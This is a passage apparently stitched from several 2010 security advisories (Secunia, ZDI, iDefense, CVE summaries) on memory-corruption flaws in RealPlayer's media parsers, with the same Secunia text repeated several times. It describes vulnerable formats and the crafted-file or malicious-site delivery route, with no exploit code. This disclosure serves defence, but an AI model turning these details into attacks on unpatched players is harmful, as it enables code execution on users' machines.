mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi

The RealAudio codec in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, Mac RealPlayer 11.0 through 12.0.0.1444, and Linux RealPlayer 11.0.2.1744 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted audio stream in a RealMedia file. Real Networks RealPlayer is prone to a memory-corruption vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition. This issue affects Windows RealPlayer SP 1.1.4 and prior, Mac RealPlayer 12.0.0.1379 and prior, and Linux RealPlayer 11.0.2.1744 and prior. NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: RealPlayer Multiple Vulnerabilities SECUNIA ADVISORY ID: SA38550 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/38550/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 RELEASE DATE: 2010-12-12 DISCUSS ADVISORY: http://secunia.com/advisories/38550/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/38550/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in RealPlayer, which can be exploited by malicious people to compromise a user's system. 1) An error exists when parsing RealAudio content encoded using the "cook" codec. This can be exploited to trigger the use of uninitialised memory and potentially cause a memory corruption via e.g. a specially crafted RealMedia file. 2) An error in the handling of errors encountered while decoding "cook"-encoded audio content can be exploited to trigger the use of uninitialised memory and potentially free an arbitrary address. 3) An error in the parsing of AAC audio content can be exploited to corrupt memory via specially crafted spectral data. 4) An array indexing error when parsing Media Properties Header (MDPR) in a RealMedia file can be exploited to corrupt memory. 5) An input validation error when parsing a RealMedia file can be exploited to cause a buffer overflow via a specially crafted multi-rate audio stream. 6) An error in the processing of the "StreamTitle" tag in a SHOUTcast stream using the ICY protocol can be exploited to cause an allocation failure for heap memory, which can result in the usage of freed pointers. 7) An integer overflow error when parsing a MLLT atom in an .AAC file can be exploited to cause a buffer overflow. 8) An input validation error in the "pnen3260.dll" module in the parsing of TIT2 atoms within AAC files can be exploited to corrupt memory. 9) An integer overflow in the parsing of GIF87a files over the streaming protocol RTSP can be exploited to cause a buffer overflow via a large "Screen Width" size in the "Screen Descriptor" header. 10) An error in the parsing of audio codec information in a Real Audio media file can be exploited to to cause a heap-based buffer overflow via a large number of subbands. 11) An input validation error in drv2.dll when decompressing RV20 video streams can be exploited to corrupt heap memory. 12) An unspecified error related to "SIPR" parsing can be exploited to corrupt heap memory. 13) An unspecified error related to "SOUND" processing can be exploited to corrupt heap memory. 14) An unspecified error related to "AAC" processing can be exploited to corrupt heap memory. 15) An unspecified error related to "RealMedia" processing can be exploited to corrupt heap memory. 16) An unspecified error related to "RA5" processing can be exploited to corrupt heap memory. 17) An integer overflow in "drv1.dll" when parsing SIPR stream metadata can be exploited to cause a heap-based buffer overflow, e.g. via the RealPlayer ActiveX control. 18) An input validation error in the processing of RealMedia files can be exploited to corrupt heap memory. 19) An input validation error in the RealAudio codec when processing RealMedia files can be exploited to corrupt heap memory. 20) An error in the "HandleAction" method in the RealPlayer ActiveX control allows users to download and execute scripts in the "Local Zone". 21) Input sanitisation errors in the "Custsupport.html", "Main.html", and "Upsell.htm" components can be exploited to inject arbitrary code into the RealOneActiveXObject process and load unsafe controls. 22) A boundary error in the parsing of cook-specific data used for initialization can be exploited to cause a heap-based buffer overflow. 23) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to cause a heap-based buffer overflow via an invalid size for an embedded MDPR chunk. 24) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to corrupt heap memory via an invalid number streams within the chunk. 25) An input validation error when parsing the RMX file format can be exploited to cause a heap-based buffer overflow. 26) An error when decoding data for particular mime types within a RealMedia file can be exploited to cause a heap-based buffer overflow. 27) An error in the parsing of server headers can be exploited to cause a heap-based buffer overflow via an image tag pointing to a malicious server, which causes the player to fetch a remote file. 28) An error in the implementation of the Advanced Audio Coding compression when decoding a conditional component of a data block within an AAC frame can be exploited to corrupt memory. SOLUTION: Upgrade to RealPlayer 14.0.0 or later. PROVIDED AND/OR DISCOVERED BY: 1, 2) Alin Rad Pop, Secunia Research. 3) Carsten Eiram, Secunia Research. 4) Anonymous and Hossein Lotfi, reported via ZDI. 5 - 11, 20, 21) Anonymous, reported via ZDI. 12 - 14) The vendor credits Nicolas Joly, Vupen 15) The vendor credits Chaouki Bekrar, Vupen 17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs 18, 19) Omair, reported via iDefense. 22, 28) Damian Put, reported via ZDI. 23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team lollersk8erz. 25) Sebastian Apelt, reported via ZDI. 26) Sebastian Apelt and Andreas Schmidt, reported via ZDI. 27) AbdulAziz Hariri, reported via ZDI. ORIGINAL ADVISORY: Secunia Research: http://secunia.com/secunia_research/2010-9/ http://secunia.com/secunia_research/2010-14/ http://secunia.com/secunia_research/2010-15/ RealNetworks: http://service.real.com/realplayer/security/12102010_player/en/ http://realnetworksblog.com/?p=2216 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-268/ http://www.zerodayinitiative.com/advisories/ZDI-10-266/ http://www.zerodayinitiative.com/advisories/ZDI-10-270/ http://www.zerodayinitiative.com/advisories/ZDI-10-273/ http://www.zerodayinitiative.com/advisories/ZDI-10-269/ http://www.zerodayinitiative.com/advisories/ZDI-10-271/ http://www.zerodayinitiative.com/advisories/ZDI-10-272/ http://www.zerodayinitiative.com/advisories/ZDI-10-274/ http://www.zerodayinitiative.com/advisories/ZDI-10-275/ http://www.zerodayinitiative.com/advisories/ZDI-10-276/ http://www.zerodayinitiative.com/advisories/ZDI-10-277/ http://www.zerodayinitiative.com/advisories/ZDI-10-278/ http://www.zerodayinitiative.com/advisories/ZDI-10-279/ http://www.zerodayinitiative.com/advisories/ZDI-10-281/ http://www.zerodayinitiative.com/advisories/ZDI-10-280/ http://www.zerodayinitiative.com/advisories/ZDI-10-282/ http://www.zerodayinitiative.com/advisories/ZDI-10-267/ TippingPoint DVLabs: http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . BACKGROUND RealPlayer is RealNetworks's media player product used to render video and other media. For more information, visit http://www.real.com/. II. The vulnerability specifically exists in the way RealPlayer handles specially crafted RealMedia files using RealAudio codec. III. To exploit this vulnerability, an attacker must persuade a victim into using RealPlayer to open a specially crafted media file. This could be accomplished by either direct link or referenced from a website under the attacker's control. An attacker could host a Web page containing a malformed file. Alternatively a malicious media file could be attached within an e-mail file. IV. V. WORKAROUND iDefense is currently unaware of any workaround for this issue. VI. VENDOR RESPONSE RealNetworks has released a patch which addresses this issue. Information about downloadable vendor updates can be found by clicking on the URLs shown. http://service.real.com/realplayer/security/12102010_player/en/ VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2010-4387 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 05/12/2010 Initial Contact 05/12/2010 Initial Response 12/10/2010 Coordinated public disclosure IX. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright \xa9 2010 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information

Array index error in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer Enterprise 2.1.2, Mac RealPlayer 11.0 through 11.1, Linux RealPlayer 11.0.2.1744, and possibly HelixPlayer 1.0.6 and other versions, allows remote attackers to execute arbitrary code via a malformed Media Properties Header (aka MDPR) in a RealMedia file. The application explicitly trusts an index in this data structure which is used to seek into an array of objects. If an attacker can allocate controlled data at some point after this array, an attacker can then get their fabricated object to get called leading to code execution under the context of the current user. Real Networks RealPlayer is prone to a memory-corruption vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition. This issue affects Windows RealPlayer 11.1 and prior, RealPlayer Enterprise 2.1.2 and prior, Mac RealPlayer 11.0.1.949 and prior, and Linux RealPlayer 11.0.2.1744 and prior. NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealNetworks RealNetworks RealPlayer is a set of media player products developed by RealNetworks in the United States. The product provides features for downloading/converting videos (in web pages), editing videos, managing media files, and more. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: RealPlayer Multiple Vulnerabilities SECUNIA ADVISORY ID: SA38550 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/38550/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 RELEASE DATE: 2010-12-12 DISCUSS ADVISORY: http://secunia.com/advisories/38550/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/38550/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in RealPlayer, which can be exploited by malicious people to compromise a user's system. 1) An error exists when parsing RealAudio content encoded using the "cook" codec. This can be exploited to trigger the use of uninitialised memory and potentially cause a memory corruption via e.g. a specially crafted RealMedia file. 2) An error in the handling of errors encountered while decoding "cook"-encoded audio content can be exploited to trigger the use of uninitialised memory and potentially free an arbitrary address. 3) An error in the parsing of AAC audio content can be exploited to corrupt memory via specially crafted spectral data. 4) An array indexing error when parsing Media Properties Header (MDPR) in a RealMedia file can be exploited to corrupt memory. 5) An input validation error when parsing a RealMedia file can be exploited to cause a buffer overflow via a specially crafted multi-rate audio stream. 6) An error in the processing of the "StreamTitle" tag in a SHOUTcast stream using the ICY protocol can be exploited to cause an allocation failure for heap memory, which can result in the usage of freed pointers. 7) An integer overflow error when parsing a MLLT atom in an .AAC file can be exploited to cause a buffer overflow. 8) An input validation error in the "pnen3260.dll" module in the parsing of TIT2 atoms within AAC files can be exploited to corrupt memory. 9) An integer overflow in the parsing of GIF87a files over the streaming protocol RTSP can be exploited to cause a buffer overflow via a large "Screen Width" size in the "Screen Descriptor" header. 10) An error in the parsing of audio codec information in a Real Audio media file can be exploited to to cause a heap-based buffer overflow via a large number of subbands. 11) An input validation error in drv2.dll when decompressing RV20 video streams can be exploited to corrupt heap memory. 12) An unspecified error related to "SIPR" parsing can be exploited to corrupt heap memory. 13) An unspecified error related to "SOUND" processing can be exploited to corrupt heap memory. 14) An unspecified error related to "AAC" processing can be exploited to corrupt heap memory. 15) An unspecified error related to "RealMedia" processing can be exploited to corrupt heap memory. 16) An unspecified error related to "RA5" processing can be exploited to corrupt heap memory. 17) An integer overflow in "drv1.dll" when parsing SIPR stream metadata can be exploited to cause a heap-based buffer overflow, e.g. via the RealPlayer ActiveX control. 18) An input validation error in the processing of RealMedia files can be exploited to corrupt heap memory. 19) An input validation error in the RealAudio codec when processing RealMedia files can be exploited to corrupt heap memory. 20) An error in the "HandleAction" method in the RealPlayer ActiveX control allows users to download and execute scripts in the "Local Zone". 21) Input sanitisation errors in the "Custsupport.html", "Main.html", and "Upsell.htm" components can be exploited to inject arbitrary code into the RealOneActiveXObject process and load unsafe controls. 22) A boundary error in the parsing of cook-specific data used for initialization can be exploited to cause a heap-based buffer overflow. 23) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to cause a heap-based buffer overflow via an invalid size for an embedded MDPR chunk. 24) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to corrupt heap memory via an invalid number streams within the chunk. 25) An input validation error when parsing the RMX file format can be exploited to cause a heap-based buffer overflow. 26) An error when decoding data for particular mime types within a RealMedia file can be exploited to cause a heap-based buffer overflow. 27) An error in the parsing of server headers can be exploited to cause a heap-based buffer overflow via an image tag pointing to a malicious server, which causes the player to fetch a remote file. 28) An error in the implementation of the Advanced Audio Coding compression when decoding a conditional component of a data block within an AAC frame can be exploited to corrupt memory. SOLUTION: Upgrade to RealPlayer 14.0.0 or later. PROVIDED AND/OR DISCOVERED BY: 1, 2) Alin Rad Pop, Secunia Research. 3) Carsten Eiram, Secunia Research. 4) Anonymous and Hossein Lotfi, reported via ZDI. 5 - 11, 20, 21) Anonymous, reported via ZDI. 12 - 14) The vendor credits Nicolas Joly, Vupen 15) The vendor credits Chaouki Bekrar, Vupen 17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs 18, 19) Omair, reported via iDefense. 22, 28) Damian Put, reported via ZDI. 23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team lollersk8erz. 25) Sebastian Apelt, reported via ZDI. 26) Sebastian Apelt and Andreas Schmidt, reported via ZDI. 27) AbdulAziz Hariri, reported via ZDI. ORIGINAL ADVISORY: Secunia Research: http://secunia.com/secunia_research/2010-9/ http://secunia.com/secunia_research/2010-14/ http://secunia.com/secunia_research/2010-15/ RealNetworks: http://service.real.com/realplayer/security/12102010_player/en/ http://realnetworksblog.com/?p=2216 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-268/ http://www.zerodayinitiative.com/advisories/ZDI-10-266/ http://www.zerodayinitiative.com/advisories/ZDI-10-270/ http://www.zerodayinitiative.com/advisories/ZDI-10-273/ http://www.zerodayinitiative.com/advisories/ZDI-10-269/ http://www.zerodayinitiative.com/advisories/ZDI-10-271/ http://www.zerodayinitiative.com/advisories/ZDI-10-272/ http://www.zerodayinitiative.com/advisories/ZDI-10-274/ http://www.zerodayinitiative.com/advisories/ZDI-10-275/ http://www.zerodayinitiative.com/advisories/ZDI-10-276/ http://www.zerodayinitiative.com/advisories/ZDI-10-277/ http://www.zerodayinitiative.com/advisories/ZDI-10-278/ http://www.zerodayinitiative.com/advisories/ZDI-10-279/ http://www.zerodayinitiative.com/advisories/ZDI-10-281/ http://www.zerodayinitiative.com/advisories/ZDI-10-280/ http://www.zerodayinitiative.com/advisories/ZDI-10-282/ http://www.zerodayinitiative.com/advisories/ZDI-10-267/ TippingPoint DVLabs: http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-10-268: RealNetworks RealPlayer Media Properties Header Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-268 December 10, 2010 -- CVE ID: CVE-2010-4384 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: RealNetworks -- Affected Products: RealNetworks RealPlayer -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6853. -- Vendor Response: RealNetworks has issued an update to correct this vulnerability. More details can be found at: http://service.real.com/realplayer/security/12102010_player/en/ -- Disclosure Timeline: 2009-02-24 - Vulnerability reported to vendor 2010-12-10 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous * Hossein Lotfi -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi

Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, RealPlayer Enterprise 2.1.2, Mac RealPlayer 11.0 through 12.0.0.1444, Linux RealPlayer 11.0.2.1744, and possibly HelixPlayer 1.0.6 and other versions, allows remote attackers to have an unspecified impact via a crafted RA5 file. RealNetworks RealPlayer Is RA5 A heap overflow vulnerability exists.Details of the impact of this vulnerability are unknown. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition. NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealNetworks RealNetworks RealPlayer is a set of media player products developed by RealNetworks in the United States. The product provides features for downloading/converting videos (in web pages), editing videos, managing media files, and more. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: RealPlayer Multiple Vulnerabilities SECUNIA ADVISORY ID: SA38550 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/38550/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 RELEASE DATE: 2010-12-12 DISCUSS ADVISORY: http://secunia.com/advisories/38550/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/38550/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=38550 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in RealPlayer, which can be exploited by malicious people to compromise a user's system. 1) An error exists when parsing RealAudio content encoded using the "cook" codec. This can be exploited to trigger the use of uninitialised memory and potentially cause a memory corruption via e.g. a specially crafted RealMedia file. 2) An error in the handling of errors encountered while decoding "cook"-encoded audio content can be exploited to trigger the use of uninitialised memory and potentially free an arbitrary address. 3) An error in the parsing of AAC audio content can be exploited to corrupt memory via specially crafted spectral data. 4) An array indexing error when parsing Media Properties Header (MDPR) in a RealMedia file can be exploited to corrupt memory. 5) An input validation error when parsing a RealMedia file can be exploited to cause a buffer overflow via a specially crafted multi-rate audio stream. 6) An error in the processing of the "StreamTitle" tag in a SHOUTcast stream using the ICY protocol can be exploited to cause an allocation failure for heap memory, which can result in the usage of freed pointers. 7) An integer overflow error when parsing a MLLT atom in an .AAC file can be exploited to cause a buffer overflow. 8) An input validation error in the "pnen3260.dll" module in the parsing of TIT2 atoms within AAC files can be exploited to corrupt memory. 9) An integer overflow in the parsing of GIF87a files over the streaming protocol RTSP can be exploited to cause a buffer overflow via a large "Screen Width" size in the "Screen Descriptor" header. 10) An error in the parsing of audio codec information in a Real Audio media file can be exploited to to cause a heap-based buffer overflow via a large number of subbands. 11) An input validation error in drv2.dll when decompressing RV20 video streams can be exploited to corrupt heap memory. 12) An unspecified error related to "SIPR" parsing can be exploited to corrupt heap memory. 13) An unspecified error related to "SOUND" processing can be exploited to corrupt heap memory. 14) An unspecified error related to "AAC" processing can be exploited to corrupt heap memory. 15) An unspecified error related to "RealMedia" processing can be exploited to corrupt heap memory. 16) An unspecified error related to "RA5" processing can be exploited to corrupt heap memory. 17) An integer overflow in "drv1.dll" when parsing SIPR stream metadata can be exploited to cause a heap-based buffer overflow, e.g. via the RealPlayer ActiveX control. 18) An input validation error in the processing of RealMedia files can be exploited to corrupt heap memory. 19) An input validation error in the RealAudio codec when processing RealMedia files can be exploited to corrupt heap memory. 20) An error in the "HandleAction" method in the RealPlayer ActiveX control allows users to download and execute scripts in the "Local Zone". 21) Input sanitisation errors in the "Custsupport.html", "Main.html", and "Upsell.htm" components can be exploited to inject arbitrary code into the RealOneActiveXObject process and load unsafe controls. 22) A boundary error in the parsing of cook-specific data used for initialization can be exploited to cause a heap-based buffer overflow. 23) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to cause a heap-based buffer overflow via an invalid size for an embedded MDPR chunk. 24) An error in the parsing of MLTI chunks when processing Internet Video Recording (.ivr) files can be exploited to corrupt heap memory via an invalid number streams within the chunk. 25) An input validation error when parsing the RMX file format can be exploited to cause a heap-based buffer overflow. 26) An error when decoding data for particular mime types within a RealMedia file can be exploited to cause a heap-based buffer overflow. 27) An error in the parsing of server headers can be exploited to cause a heap-based buffer overflow via an image tag pointing to a malicious server, which causes the player to fetch a remote file. 28) An error in the implementation of the Advanced Audio Coding compression when decoding a conditional component of a data block within an AAC frame can be exploited to corrupt memory. SOLUTION: Upgrade to RealPlayer 14.0.0 or later. PROVIDED AND/OR DISCOVERED BY: 1, 2) Alin Rad Pop, Secunia Research. 3) Carsten Eiram, Secunia Research. 4) Anonymous and Hossein Lotfi, reported via ZDI. 5 - 11, 20, 21) Anonymous, reported via ZDI. 12 - 14) The vendor credits Nicolas Joly, Vupen 15) The vendor credits Chaouki Bekrar, Vupen 17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs 18, 19) Omair, reported via iDefense. 22, 28) Damian Put, reported via ZDI. 23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team lollersk8erz. 25) Sebastian Apelt, reported via ZDI. 26) Sebastian Apelt and Andreas Schmidt, reported via ZDI. 27) AbdulAziz Hariri, reported via ZDI. ORIGINAL ADVISORY: Secunia Research: http://secunia.com/secunia_research/2010-9/ http://secunia.com/secunia_research/2010-14/ http://secunia.com/secunia_research/2010-15/ RealNetworks: http://service.real.com/realplayer/security/12102010_player/en/ http://realnetworksblog.com/?p=2216 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-268/ http://www.zerodayinitiative.com/advisories/ZDI-10-266/ http://www.zerodayinitiative.com/advisories/ZDI-10-270/ http://www.zerodayinitiative.com/advisories/ZDI-10-273/ http://www.zerodayinitiative.com/advisories/ZDI-10-269/ http://www.zerodayinitiative.com/advisories/ZDI-10-271/ http://www.zerodayinitiative.com/advisories/ZDI-10-272/ http://www.zerodayinitiative.com/advisories/ZDI-10-274/ http://www.zerodayinitiative.com/advisories/ZDI-10-275/ http://www.zerodayinitiative.com/advisories/ZDI-10-276/ http://www.zerodayinitiative.com/advisories/ZDI-10-277/ http://www.zerodayinitiative.com/advisories/ZDI-10-278/ http://www.zerodayinitiative.com/advisories/ZDI-10-279/ http://www.zerodayinitiative.com/advisories/ZDI-10-281/ http://www.zerodayinitiative.com/advisories/ZDI-10-280/ http://www.zerodayinitiative.com/advisories/ZDI-10-282/ http://www.zerodayinitiative.com/advisories/ZDI-10-267/ TippingPoint DVLabs: http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, RealPlayer Enterprise 2.1.2, and Mac RealPlayer 11.0 through 12.0.0.1444 allows remote attackers to have an unspecified impact via a crafted AAC file. RealNetworks RealPlayer Is AAC A heap overflow vulnerability exists.Details of the impact of this vulnerability are unknown. Real Networks RealPlayer is prone to a heap overflow vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition. NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealPlayer is a software package released and maintained by Real Networks, which can be used to play multimedia files encoded in Real Media format. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: RealPlayer Multiple Vulnerabilities SECUNIA ADVISORY ID: SA38550 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/38550/ Customer Area (Credentials Required) 